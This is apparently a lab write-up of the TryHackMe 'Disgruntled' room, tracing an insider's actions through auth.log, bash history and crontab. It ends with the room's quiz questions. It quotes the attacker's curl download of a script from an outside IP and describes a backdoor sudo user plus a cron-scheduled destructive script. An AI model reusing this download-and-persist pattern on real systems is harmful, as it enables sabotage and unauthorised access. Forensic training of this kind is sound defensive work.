We covered using Linux forensics to investigate a cyber incident. We covered reading and extracting evidence from log files and command history. This was part of TryHackMe Disgruntled
Initial Investigation & Privileged Commands
I started by looking for privileged commands executed by the employee. To find commands run with sudo, I checked the authentication logs using cat /var/log/auth.log | grep -i "COMMAND". I then refined this to filter for commands related to package installation with cat /var/log/auth.log | grep -i "sudo" | grep "install". This revealed the installation of “dokuwiki.” From the same log entry, I identified the present working directory when “dokuwiki” was installed as /home/cyberT.
User Creation and Privilege Escalation
Next, I looked for user creation events after the package installation using cat /var/log/auth.log | grep -i "add user". This showed a user named “it-admin” was created, and the timestamp indicated this happened shortly after the dokuwiki installation.
I then checked when the sudoers file was updated to grant this new user sudo privileges. I used cat /var/log/auth.log | grep -i "vi /sudo" (implying visudo was used, which logs as vi /etc/sudoers.tmp or similar). The log entry associated with the cyberT user’s working directory was the relevant one.
Suspicious Script Activity
I investigated for files opened with the vi text editor. Initially, I checked for saved files using cat /home/it-admin/.viminfo | grep "save as", which revealed a file /bin/always_update was saved. To find opened files, I checked the authentication logs again, specifically filtering for vi commands executed by the it-admin user. This showed a script file named “bump.sh” was opened.
Suspecting bump.sh to be malicious but finding it deleted, I looked for how it was created by checking the bash history of the it-admin user. I navigated to /home/it-admin and ran cat .bash_history. This revealed the bump.sh script was downloaded using curl from an IP address and saved as bump (curl <IP_ADDRESS>/bump -o bump).
The script was then renamed and moved, so I checked scheduled tasks as the user likely wanted it to execute later. I used cat /etc/crontab, which showed a script /bin/OS-update was scheduled to run. This was the new name and location of the bump.sh script.
Analyzing the Malicious Script
I checked the last modification time of the /bin/OS-update script using ls -la /bin/OS-update. Then, I examined its contents with cat /bin/OS-update. The script contained commands to remove a package and echo taunting messages, including “I told you you would regret this” and “goodbye.” From the echo command output redirection within the script, I identified that a file named good_evidence would be created when this script executed. The crontab entry confirmed the /bin/OS-update script was scheduled to run daily at 8:00 AM.
In summary, I discovered that the disgruntled employee installed a package, created a new user (it-admin), granted it sudo privileges, downloaded a malicious script (bump.sh), renamed and moved it to /bin/OS-update, and scheduled it to run via cron to cause damage and leave taunting messages.
TryHackMe Disgruntled Room Answers
What was the present working directory (PWD) when the previous command was run?
A user was then later given sudo priveleges. When was the sudoers file updated? (Format: Month Day HH:MM:SS)
A script file was opened using the “vi” text editor. What is the name of this file?
The file was renamed and moved to a different directory. What is the full path of this file now?
When was the file from the previous question last modified? (Format: Month Day HH:MM)
What is the name of the file that will get created when the file from the first question executes?
